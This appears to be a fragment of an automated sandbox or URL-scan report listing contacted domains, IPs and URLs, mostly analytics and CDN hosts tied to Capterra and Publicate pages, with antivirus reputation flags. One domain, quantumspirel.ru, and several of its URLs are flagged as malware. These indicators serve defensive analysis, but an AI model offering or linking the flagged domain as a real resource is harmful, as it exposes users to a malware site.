                                                                          5.9.73.80
                                                                          truefalse
                                                                            unknown
                                                                            seoab.io
                                                                            35.244.240.189
                                                                            truefalse
                                                                              unknown
                                                                              unpkg.com
                                                                              104.17.249.203
                                                                              truefalse
                                                                                unknown
                                                                                cdn.cookielaw.org
                                                                                104.18.86.42
                                                                                truefalse
                                                                                  unknown
                                                                                  dart.l.doubleclick.net
                                                                                  142.250.185.198
                                                                                  truefalse
                                                                                    unknown
                                                                                    afe79c04fd8464db69f453355c110684-6aa967fe209738b1.elb.us-east-1.amazonaws.com
                                                                                    54.147.21.139
                                                                                    truefalse
                                                                                      unknown
                                                                                      adservice.google.com
                                                                                      142.250.185.130
                                                                                      truefalse
                                                                                        unknown
                                                                                        dl7g9llrghqi1.cloudfront.net
                                                                                        18.245.86.73
                                                                                        truefalse
                                                                                          unknown
                                                                                          scontent.xx.fbcdn.net
                                                                                          157.240.252.13
                                                                                          truefalse
                                                                                            unknown
                                                                                            code.jquery.com
                                                                                            151.101.2.137
                                                                                            truefalse
                                                                                              unknown
                                                                                              script.hotjar.com
                                                                                              13.227.219.71
                                                                                              truefalse
                                                                                                unknown
                                                                                                nexus-websocket-a.intercom.io
                                                                                                34.237.73.95
                                                                                                truefalse
                                                                                                  unknown
                                                                                                  prod.adobeccstatic.com
                                                                                                  18.239.83.71
                                                                                                  truefalse
                                                                                                    unknown
                                                                                                    dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com
                                                                                                    54.77.85.140
                                                                                                    truefalse
                                                                                                      unknown
                                                                                                      browser-intake-datadoghq.com
                                                                                                      3.233.158.24
                                                                                                      truefalse
                                                                                                        unknown
                                                                                                        d-ipv6.mmapiws.com
                                                                                                        104.18.34.178
                                                                                                        truefalse
                                                                                                          unknown
                                                                                                          a.nel.cloudflare.com
                                                                                                          35.190.80.1
                                                                                                          truefalse
                                                                                                            unknown
                                                                                                            cname.vercel-dns.com
                                                                                                            76.76.21.142
                                                                                                            truefalse
                                                                                                              unknown
                                                                                                              widget.intercom.io
                                                                                                              18.239.83.71
                                                                                                              truefalse
                                                                                                                unknown
                                                                                                                ad.doubleclick.net
                                                                                                                172.217.16.134
                                                                                                                truefalse
                                                                                                                  unknown
                                                                                                                  js-agent.newrelic.com
                                                                                                                  162.247.243.39
                                                                                                                  truefalse
                                                                                                                    unknown
                                                                                                                    s-part-0017.t-0009.t-msedge.net
                                                                                                                    13.107.246.45
                                                                                                                    truefalse
                                                                                                                      unknown
                                                                                                                      quantumspirel.ru
                                                                                                                      172.67.187.13
                                                                                                                      truetrue
                                                                                                                        unknown
                                                                                                                        fastly-tls12-bam-cell.nr-data.net
                                                                                                                        162.247.243.30
                                                                                                                        truefalse
                                                                                                                          unknown
                                                                                                                          ax-0001.ax-msedge.net
                                                                                                                          150.171.28.10
                                                                                                                          truefalse
                                                                                                                            unknown
                                                                                                                            d3e54v103j8qbb.cloudfront.net
                                                                                                                            3.161.127.167
                                                                                                                            truefalse
                                                                                                                              unknown
                                                                                                                              www.datadoghq-browser-agent.com
                                                                                                                              18.239.49.193
                                                                                                                              truefalse
                                                                                                                                unknown
                                                                                                                                analytics.google.com
                                                                                                                                216.58.212.142
                                                                                                                                truefalse
                                                                                                                                  unknown
                                                                                                                                  geolocation.onetrust.com
                                                                                                                                  172.64.155.119
                                                                                                                                  truefalse
                                                                                                                                    unknown
                                                                                                                                    metrics.api.drift.com
                                                                                                                                    unknown
                                                                                                                                    unknownfalse
                                                                                                                                      unknown
                                                                                                                                      t.clarity.ms
                                                                                                                                      unknown
                                                                                                                                      unknownfalse
                                                                                                                                        unknown
                                                                                                                                        i.vimeocdn.com
                                                                                                                                        unknown
                                                                                                                                        unknownfalse
                                                                                                                                          unknown
                                                                                                                                          cm.everesttech.net
                                                                                                                                          unknown
                                                                                                                                          unknownfalse
                                                                                                                                            unknown
                                                                                                                                            static.woopra.com
                                                                                                                                            unknown
                                                                                                                                            unknownfalse
                                                                                                                                              unknown
                                                                                                                                              js.driftt.com
                                                                                                                                              unknown
                                                                                                                                              unknownfalse
                                                                                                                                                unknown
                                                                                                                                                static.hotjar.com
                                                                                                                                                unknown
                                                                                                                                                unknownfalse
                                                                                                                                                  unknown
                                                                                                                                                  c.clarity.ms
                                                                                                                                                  unknown
                                                                                                                                                  unknownfalse
                                                                                                                                                    unknown
                                                                                                                                                    conversation.api.drift.com
                                                                                                                                                    unknown
                                                                                                                                                    unknownfalse
                                                                                                                                                      unknown
                                                                                                                                                      use.typekit.net
                                                                                                                                                      unknown
                                                                                                                                                      unknownfalse
                                                                                                                                                        unknown
                                                                                                                                                        forms-as-a-service.capterra.com
                                                                                                                                                        unknown
                                                                                                                                                        unknownfalse
                                                                                                                                                          unknown
                                                                                                                                                          img.en25.com
                                                                                                                                                          unknown
                                                                                                                                                          unknownfalse
                                                                                                                                                            unknown
                                                                                                                                                            gdm-catalog-fmapi-prod.imgix.net
                                                                                                                                                            unknown
                                                                                                                                                            unknownfalse
                                                                                                                                                              unknown
                                                                                                                                                              connect.facebook.net
                                                                                                                                                              unknown
                                                                                                                                                              unknownfalse
                                                                                                                                                                unknown
                                                                                                                                                                px.ads.linkedin.com
                                                                                                                                                                unknown
                                                                                                                                                                unknownfalse
                                                                                                                                                                  unknown
                                                                                                                                                                  p.typekit.net
                                                                                                                                                                  unknown
                                                                                                                                                                  unknownfalse
                                                                                                                                                                    unknown
                                                                                                                                                                    evantaagartnercompany.demdex.net
                                                                                                                                                                    unknown
                                                                                                                                                                    unknownfalse
                                                                                                                                                                      unknown
                                                                                                                                                                      cdn0.capterra-static.com
                                                                                                                                                                      unknown
                                                                                                                                                                      unknownfalse
                                                                                                                                                                        unknown
                                                                                                                                                                        a.quora.com
                                                                                                                                                                        unknown
                                                                                                                                                                        unknownfalse
                                                                                                                                                                          unknown
                                                                                                                                                                          www.capterra.com
                                                                                                                                                                          unknown
                                                                                                                                                                          unknownfalse
                                                                                                                                                                            unknown
                                                                                                                                                                            customer.api.drift.com
                                                                                                                                                                            unknown
                                                                                                                                                                            unknownfalse
                                                                                                                                                                              unknown
                                                                                                                                                                              dpm.demdex.net
                                                                                                                                                                              unknown
                                                                                                                                                                              unknownfalse
                                                                                                                                                                                unknown
                                                                                                                                                                                bam-cell.nr-data.net
                                                                                                                                                                                unknown
                                                                                                                                                                                unknownfalse
                                                                                                                                                                                  unknown
                                                                                                                                                                                  sc.lfeeder.com
                                                                                                                                                                                  unknown
                                                                                                                                                                                  unknownfalse
                                                                                                                                                                                    unknown
                                                                                                                                                                                    www.facebook.com
                                                                                                                                                                                    unknown
                                                                                                                                                                                    unknownfalse
                                                                                                                                                                                      unknown
                                                                                                                                                                                      www.clarity.ms
                                                                                                                                                                                      unknown
                                                                                                                                                                                      unknownfalse
                                                                                                                                                                                        unknown
                                                                                                                                                                                        tracking.capterra.com
                                                                                                                                                                                        unknown
                                                                                                                                                                                        unknownfalse
                                                                                                                                                                                          unknown
                                                                                                                                                                                          www.linkedin.com
                                                                                                                                                                                          unknown
                                                                                                                                                                                          unknownfalse
                                                                                                                                                                                            unknown
                                                                                                                                                                                            8036043.fls.doubleclick.net
                                                                                                                                                                                            unknown
                                                                                                                                                                                            unknownfalse
                                                                                                                                                                                              unknown
                                                                                                                                                                                              targeting.api.drift.com
                                                                                                                                                                                              unknown
                                                                                                                                                                                              unknownfalse
                                                                                                                                                                                                unknown
                                                                                                                                                                                                public.profitwell.com
                                                                                                                                                                                                unknown
                                                                                                                                                                                                unknownfalse
                                                                                                                                                                                                  unknown
                                                                                                                                                                                                  snap.licdn.com
                                                                                                                                                                                                  unknown
                                                                                                                                                                                                  unknownfalse
                                                                                                                                                                                                    unknown
                                                                                                                                                                                                    lead-acquisition-service.softwareadvice.com
                                                                                                                                                                                                    unknown
                                                                                                                                                                                                    unknownfalse
                                                                                                                                                                                                      unknown
                                                                                                                                                                                                      NameMaliciousAntivirus DetectionReputation
                                                                                                                                                                                                      https://js.driftt.com/core?d=1&embedId=5amzsk8w99z9&eId=5amzsk8w99z9&region=US&forceShow=false&skipCampaigns=false&sessionId=4a25ecd6-3ad8-40f3-82c6-efde01e22fdf&sessionStarted=1725034605.514&campaignRefreshToken=6bdf6934-57dd-427f-9a20-51ada464fb1b&hideController=false&pageLoadStartTime=1725034597937&mode=CHAT&driftEnableLog=false&secureIframe=false&u=https%3A%2F%2Fwww.capterra.com%2Fp%2F145471%2FPublicate%2Ffalse
                                                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                                                      unknown
                                                                                                                                                                                                      https://gdm-catalog-fmapi-prod.imgix.net/ProductLogo/5152f7c6-61ed-4168-b89f-f436d97ebccd.png?w=60&h=60&dpr=2&auto=formatfalse
                                                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                                                      unknown
                                                                                                                                                                                                      https://cdn.cookielaw.org/scripttemplates/202403.2.0/assets/otCommonStyles.cssfalse
                                                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                                                      unknown
                                                                                                                                                                                                      https://gdm-catalog-fmapi-prod.imgix.net/ProductLogo/229dd3ed-048e-42a1-96c3-68cd64c6a705.png?auto=format%2Ccompress&fit=max&w=32&q=75&ch=Width%2CDPRfalse
                                                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                                                      unknown
                                                                                                                                                                                                      https://gdm-catalog-fmapi-prod.imgix.net/ProductLogo/0c617aed-05cb-4242-a1ed-7a7e79c76fb7.png?w=60&h=60&dpr=2&auto=formatfalse
                                                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                                                      unknown
                                                                                                                                                                                                      https://js.driftt.com/core/assets/js/16.d215b579.chunk.jsfalse
                                                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                                                      unknown
                                                                                                                                                                                                      https://gdm-catalog-fmapi-prod.imgix.net/ProductLogo/f2e2e04e-14be-474e-8d90-7162080c28b0.png?w=60&h=60&dpr=2&auto=formatfalse
                                                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                                                      unknown
                                                                                                                                                                                                      https://js.driftt.com/core/assets/js/8.3f6aefd1.chunk.jsfalse
                                                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                                                      unknown
                                                                                                                                                                                                      https://cdn0.capterra-static.com/static/javascripts/ecid.jsfalse
                                                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                                                      unknown
                                                                                                                                                                                                      https://publicate.it/images/template5-p-500.pngfalse
                                                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                                                      unknown
                                                                                                                                                                                                      https://forms-as-a-service.capterra.com/modal/6HyOcTRcBkZLAc2QGex3tl?formId=6HyOcTRcBkZLAc2QGex3tlfalse
                                                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                                                      unknown
                                                                                                                                                                                                      https://reveal.clearbit.com/v1/companies/reveal?authorization=pk_4e234eeab65b11414ee6da2ca87259ad&callback=clearbitCallbackfalse
                                                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                                                      unknown
                                                                                                                                                                                                      https://gdm-catalog-fmapi-prod.imgix.net/ProductLogo/91f64896-759a-41ae-8d14-d540f90c5870.png?auto=format%2Ccompress&fit=max&w=32&q=75&ch=Width%2CDPRfalse
                                                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                                                      unknown
                                                                                                                                                                                                      https://gdm-catalog-fmapi-prod.imgix.net/ProductLogo/a67f601c-1c43-4480-8665-f74fae6e4252.png?auto=format%2Ccompress&fit=max&w=32&q=75&ch=Width%2CDPRfalse
                                                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                                                      unknown
                                                                                                                                                                                                      https://js.driftt.com/core/assets/js/22.6b9a301a.chunk.jsfalse
                                                                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                                                                      unknown
                                                                                                                                                                                                      https://gdm-catalog-fmapi-prod.imgix.net/ProductLogo/868db486-b684-43a7-827e-5e14b017756d.png?w=60&h=60&dpr=2&auto=formatfalse
                                                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                                                      unknown
                                                                                                                                                                                                      https://q.quora.com/_/ad/f3ffe7daf89b419a979311e77be0152b/pixel?tag=ViewContent&i=gtm&u=https%3A%2F%2Freviews.capterra.com%2Fsearch%2Ffalse
                                                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                                                      unknown
                                                                                                                                                                                                      https://reviews.capterra.com/_next/static/css/50b7e331868b2bdc.cssfalse
                                                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                                                      unknown
                                                                                                                                                                                                      https://publicate.it/images/template4-p-500.pngfalse
                                                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                                                      unknown
                                                                                                                                                                                                      https://reviews.capterra.com/_next/static/rlbEn55nmth45KPaQkAHZ/_buildManifest.jsfalse
                                                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                                                      unknown
                                                                                                                                                                                                      https://tracking.capterra.com/visitor/v200/svrGP?pps=3&siteid=68275882&ref2=https%3A%2F%2Fwww.capterra.com%2F&tzo=300&ms=211&optin=disabled&firstPartyCookieDomain=tracking.capterra.comfalse
                                                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                                                      unknown
                                                                                                                                                                                                      https://browser-intake-datadoghq.com/api/v2/rum?ddsource=browser&ddtags=sdk_version%3A5.23.3%2Capi%3Afetch%2Cenv%3Aprod%2Cservice%3Acrf-webapp%2Cversion%3Av0.0.1104&dd-api-key=pub17f8b79f8664e25ed6d261e2367906a1&dd-evp-origin-version=5.23.3&dd-evp-origin=browser&dd-request-id=6ac51e01-fb3b-4a59-9747-d18ff3f51754&batch_time=1725034631489false
                                                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                                                      unknown
                                                                                                                                                                                                      https://publicate.it/images/favicon.pngfalse
                                                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                                                      unknown
                                                                                                                                                                                                      https://gdm-catalog-fmapi-prod.imgix.net/ProductLogo/90cac4f1-9eba-4d30-9949-91da634d4da5.png?w=60&h=60&dpr=2&auto=formatfalse
                                                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                                                      unknown
                                                                                                                                                                                                      https://static.hotjar.com/c/hotjar-2431713.js?sv=7false
                                                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                                                      unknown
                                                                                                                                                                                                      https://publicate.it/images/more_clients.svgfalse
                                                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                                                      unknown
                                                                                                                                                                                                      https://cdn.cookielaw.org/scripttemplates/202403.2.0/assets/otCenterRounded.jsonfalse
                                                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                                                      unknown
                                                                                                                                                                                                      https://browser-intake-datadoghq.com/api/v2/rum?ddsource=browser&ddtags=sdk_version%3A5.23.3%2Capi%3Afetch%2Cenv%3Aprod%2Cservice%3Acrf-webapp%2Cversion%3Av0.0.1104&dd-api-key=pub17f8b79f8664e25ed6d261e2367906a1&dd-evp-origin-version=5.23.3&dd-evp-origin=browser&dd-request-id=348da171-cce5-486b-9006-75e82163887e&batch_time=1725034621627false
                                                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                                                      unknown
                                                                                                                                                                                                      https://js.intercomcdn.com/frame.198be77c.jsfalse
                                                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                                                      unknown
                                                                                                                                                                                                      https://lead-acquisition-service.softwareadvice.com/las-form-min.jsfalse
                                                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                                                      unknown
                                                                                                                                                                                                      https://gdm-catalog-fmapi-prod.imgix.net/ProductLogo/67665783-bd0d-4b97-99af-c628a74ea005.png?w=60&h=60&dpr=2&auto=formatfalse
                                                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                                                      unknown
                                                                                                                                                                                                      https://edge.fullstory.com/datalayer/v4/latest.jsfalse
                                                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                                                      unknown
                                                                                                                                                                                                      https://reviews.capterra.com/fsrelay/rec/integrations?OrgId=18VAT4&isInFrame=false&isNative=falsefalse
                                                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                                                      unknown
                                                                                                                                                                                                      https://reviews.capterra.com/fsrelay/rec/bundle/v2?OrgId=18VAT4&UserId=da9f39f7-d4a4-45f4-948f-86299cb47816&SessionId=084a7745-8adb-4b14-adf2-26e4e4ddbd6e&PageId=e2e5b10c-4bbc-4510-b497-529b569fdc46&Seq=2&ClientTime=1725034630155&PageStart=1725034624939&PrevBundleTime=1725034629801&LastActivity=2305&IsNewSession=true&ContentEncoding=gzipfalse
                                                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                                                      unknown
                                                                                                                                                                                                      https://gdm-catalog-fmapi-prod.imgix.net/ProductLogo/af2cdc9a-967d-4921-a711-ec9e1a75cf88.png?auto=format%2Ccompress&fit=max&w=32&q=75&ch=Width%2CDPRfalse
                                                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                                                      unknown
                                                                                                                                                                                                      https://d3e54v103j8qbb.cloudfront.net/js/jquery-3.5.1.min.dc5e7f18c8.js?site=5e9170ba37cf8dfae03ae1a4false
                                                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                                                      unknown
                                                                                                                                                                                                      https://reviews.capterra.com/_next/static/css/a4a58254eecf0029.cssfalse
                                                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                                                      unknown
                                                                                                                                                                                                      https://gdm-catalog-fmapi-prod.imgix.net/ProductLogo/08d2adc0-b055-41c3-9caa-981ebab6ae4e.png?w=60&h=60&dpr=2&auto=formatfalse
                                                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                                                      unknown
                                                                                                                                                                                                      https://forms-as-a-service.capterra.com/modal/3ob5sl3RSLbslH6LvzUKQc?formId=3ob5sl3RSLbslH6LvzUKQcfalse
                                                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                                                      unknown
                                                                                                                                                                                                      https://publicate.it/images/template3-p-500.pngfalse
                                                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                                                      unknown
                                                                                                                                                                                                      https://gdm-catalog-fmapi-prod.imgix.net/ProductLogo/507b7e72-a477-4dee-a78d-fb9cc5d95d75.png?w=60&h=60&dpr=2&auto=formatfalse
                                                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                                                      unknown
                                                                                                                                                                                                      https://js.driftt.com/core/chat?d=1&region=US&driftEnableLog=false&pageLoadStartTime=1725034597937false
                                                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                                                      unknown
                                                                                                                                                                                                      https://publicate.it/images/nhph3-p-500.jpgfalse
                                                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                                                      unknown
                                                                                                                                                                                                      https://api-iam.intercom.io/messenger/web/pingfalse
                                                                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                                                                      unknown
                                                                                                                                                                                                      https://publicate.it/images/macOS_client.svgfalse
                                                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                                                      unknown
                                                                                                                                                                                                      https://browser-intake-datadoghq.com/api/v2/rum?ddsource=browser&ddtags=sdk_version%3A5.23.3%2Capi%3Afetch%2Cenv%3Aprod%2Cservice%3Acrf-webapp%2Cversion%3Av0.0.1104&dd-api-key=pub17f8b79f8664e25ed6d261e2367906a1&dd-evp-origin-version=5.23.3&dd-evp-origin=browser&dd-request-id=900a0ed1-f9ed-43a5-9c5e-2b6ae372e5d0&batch_time=1725034628918false
                                                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                                                      unknown
                                                                                                                                                                                                      https://gdm-catalog-fmapi-prod.imgix.net/ProductLogo/7780d136-e630-42e5-adce-8f580dc09687.png?w=60&h=60&dpr=2&auto=formatfalse
                                                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                                                      unknown
                                                                                                                                                                                                      https://publicate.it/images/group-2.svgfalse
                                                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                                                      unknown
                                                                                                                                                                                                      https://cdn.cookielaw.org/scripttemplates/otSDKStub.jsfalse
                                                                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                                                                      unknown
                                                                                                                                                                                                      https://publicate.it/images/template2-p-500.pngfalse
                                                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                                                      unknown
                                                                                                                                                                                                      https://c.lytics.io/c/7dafa3f5f9e8efd6782940aa05719f12true
                                                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                                                      unknown
                                                                                                                                                                                                      https://js.intercomcdn.com/vendor.e6414237.jsfalse
                                                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                                                      unknown
                                                                                                                                                                                                      https://gdm-catalog-fmapi-prod.imgix.net/ProductLogo/dd1b7965-612d-4c53-899b-0cf4a9337971.png?auto=format%2Ccompress&fit=max&w=32&q=75&ch=Width%2CDPRfalse
                                                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                                                      unknown
                                                                                                                                                                                                      https://www.capterra.com/p/145471/Publicate/false
                                                                                                                                                                                                        unknown
                                                                                                                                                                                                        https://widget.intercom.io/widget/cirlxq0dfalse
                                                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                                                        unknown
                                                                                                                                                                                                        https://publicate.it/images/groupon.svgfalse
                                                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                                                        unknown
                                                                                                                                                                                                        https://reviews.capterra.com/_next/static/chunks/pages/_app-af44b767735d6640.jsfalse
                                                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                                                        unknown
                                                                                                                                                                                                        https://js.driftt.com/include/1725034800000/5amzsk8w99z9.jsfalse
                                                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                                                        unknown
                                                                                                                                                                                                        https://unpkg.com/web-vitals/dist/web-vitals.iife.jsfalse
                                                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                                                        unknown
                                                                                                                                                                                                        https://publicate.it/images/home_banner.pngfalse
                                                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                                                        unknown
                                                                                                                                                                                                        https://publicate.it/images/features_review_icon.pngfalse
                                                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                                                        unknown
                                                                                                                                                                                                        https://publicate.it/images/Trustpilot_logo.pngfalse
                                                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                                                        unknown
                                                                                                                                                                                                        https://reviews.capterra.com/api/v1/products/mix?lang=en&limit=48&page=0&sortBy=popularity&withFillers=truefalse
                                                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                                                        unknown
                                                                                                                                                                                                        https://reviews.capterra.com/_next/static/css/d1857e6f465dd807.cssfalse
                                                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                                                        unknown
                                                                                                                                                                                                        https://nexus-websocket-a.intercom.io/pubsub/5-2VrTcJ-wReFxxSsvN27p3l1l-rfQjhxEa0K_rcpidI_YYfbgqGBaXudDoBZfnBOD-yT-ZZ7mQ1OR91C6MrHx-21kDMXCDQnf8S3-?X-Nexus-New-Client=true&X-Nexus-Version=0.14.0&user_role=visitorfalse
                                                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                                                        unknown
                                                                                                                                                                                                        https://quantumspirel.ru//true
                                                                                                                                                                                                        • Avira URL Cloud: malware
                                                                                                                                                                                                        unknown
                                                                                                                                                                                                        https://reviews.capterra.com/_next/static/chunks/pages/products-search-269c80371465c95a.jsfalse
                                                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                                                        unknown
                                                                                                                                                                                                        https://browser-intake-datadoghq.com/api/v2/rum?ddsource=browser&ddtags=sdk_version%3A5.23.3%2Capi%3Afetch%2Cenv%3Aprod%2Cservice%3Acrf-webapp%2Cversion%3Av0.0.1104&dd-api-key=pub17f8b79f8664e25ed6d261e2367906a1&dd-evp-origin-version=5.23.3&dd-evp-origin=browser&dd-request-id=3c96175d-ecf5-4c08-b0ee-3fd5976ae652&batch_time=1725034626020false
                                                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                                                        unknown
                                                                                                                                                                                                        https://gdm-catalog-fmapi-prod.imgix.net/ProductLogo/b6523a00-951e-4e60-b7e0-a904d177d6dd.png?w=60&h=60&dpr=2&auto=formatfalse
                                                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                                                        unknown
                                                                                                                                                                                                        https://publicate.it/images/template1-p-500.pngfalse
                                                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                                                        unknown
                                                                                                                                                                                                        https://gdm-catalog-fmapi-prod.imgix.net/ProductLogo/95b201e8-845a-4064-a9b2-a8eb49d19ca3.png?w=60&h=60&dpr=2&auto=formatfalse
                                                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                                                        unknown
                                                                                                                                                                                                        https://publicate.it/images/adobe.svgfalse
                                                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                                                        unknown
                                                                                                                                                                                                        NameSourceMaliciousAntivirus DetectionReputation
                                                                                                                                                                                                        https://stats.g.doubleclick.net/g/collectchromecache_595.2.dr, chromecache_603.2.dr, chromecache_594.2.dr, chromecache_726.2.dr, chromecache_834.2.dr, chromecache_784.2.drfalse
                                                                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                                                                        unknown
                                                                                                                                                                                                        https://tailwindcss.comchromecache_738.2.dr, chromecache_556.2.drfalse
                                                                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                                                                        unknown
                                                                                                                                                                                                        https://p.typekit.net/p.css?s=1&k=urt5zuu&ht=tk&f=7180.7181.7182.7183&a=108349166&app=typekit&e=csschromecache_446.2.drfalse
                                                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                                                        unknown
                                                                                                                                                                                                        https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.min.jschromecache_429.2.drfalse
                                                                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                                                                        unknown
                                                                                                                                                                                                        http://underscorejs.orgchromecache_733.2.dr, chromecache_403.2.drfalse
                                                                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                                                                        unknown
                                                                                                                                                                                                        https://quantumspirel.ru/#faqchromecache_429.2.drtrue
                                                                                                                                                                                                        • Avira URL Cloud: malware
                                                                                                                                                                                                        unknown
                                                                                                                                                                                                        https://ampcid.google.com/v1/publisher:getClientIdchromecache_586.2.dr, chromecache_313.2.dr, chromecache_542.2.drfalse
                                                                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                                                                        unknown
                                                                                                                                                                                                        https://px.ads.linkedin.com/collect?chromecache_622.2.drfalse
                                                                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                                                                        unknown
                                                                                                                                                                                                        https://q.quora.com/_/ad/chromecache_622.2.drfalse
                                                                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                                                                        unknown
                                                                                                                                                                                                        https://use.typekit.net/af/c0160f/00000000000000007735dac8/30/d?primer=7cdcb44be4a7db8877ffa5c0007b8chromecache_446.2.drfalse
                                                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                                                        unknown
                                                                                                                                                                                                        https://www.internalfb.com/intern/invariant/chromecache_408.2.dr, chromecache_591.2.drfalse
                                                                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                                                                        unknown
                                                                                                                                                                                                        https://play.google.com/store/apps/details?id=com.facebook.orcachromecache_408.2.dr, chromecache_591.2.drfalse
                                                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                                                        unknown
                                                                                                                                                                                                        https://metrics.api.drift.comchromecache_511.2.dr, chromecache_571.2.drfalse
                                                                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                                                                        unknown
                                                                                                                                                                                                        https://stats.g.doubleclick.net/j/collectchromecache_542.2.drfalse
                                                                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                                                                        unknown
                                                                                                                                                                                                        https://github.com/microsoft/claritychromecache_558.2.dr, chromecache_371.2.drfalse
                                                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                                                        unknown
                                                                                                                                                                                                        https://docs.amplify.aws/lib/troubleshooting/upgrading/q/platform/js)chromecache_478.2.drfalse
                                                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                                                        unknown
                                                                                                                                                                                                        https://quantumspirel.ru/#serviceschromecache_429.2.drfalse
                                                                                                                                                                                                        • Avira URL Cloud: malware
                                                                                                                                                                                                        unknown
                                                                                                                                                                                                        https://quantumspirel.ru/#modern-supercarschromecache_429.2.drfalse
                                                                                                                                                                                                        • Avira URL Cloud: malware
                                                                                                                                                                                                        unknown
                                                                                                                                                                                                        https://use.typekit.net/af/95bf80/00000000000000007735dacd/30/l?primer=7cdcb44be4a7db8877ffa5c0007b8chromecache_446.2.drfalse
                                                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                                                        unknown
                                                                                                                                                                                                        https://customer.api.drift.comchromecache_511.2.dr, chromecache_571.2.drfalse
                                                                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                                                                        unknown
                                                                                                                                                                                                        https://quantumspirel.ru/#contactchromecache_429.2.drfalse
                                                                                                                                                                                                        • Avira URL Cloud: malware
                                                                                                                                                                                                        unknown
